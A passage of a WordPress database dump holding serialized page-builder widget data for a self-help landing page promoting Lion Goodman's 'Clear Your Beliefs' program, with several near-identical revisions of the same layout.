Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1196, 1678, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:646:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -8px; margin-bottom: -27px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:30px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -12px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:945:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 12px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:646:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1168, 1652, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:689:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:785:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1418:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2842:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman<br /></strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1160, 1647, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:785:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1418:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2822:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" 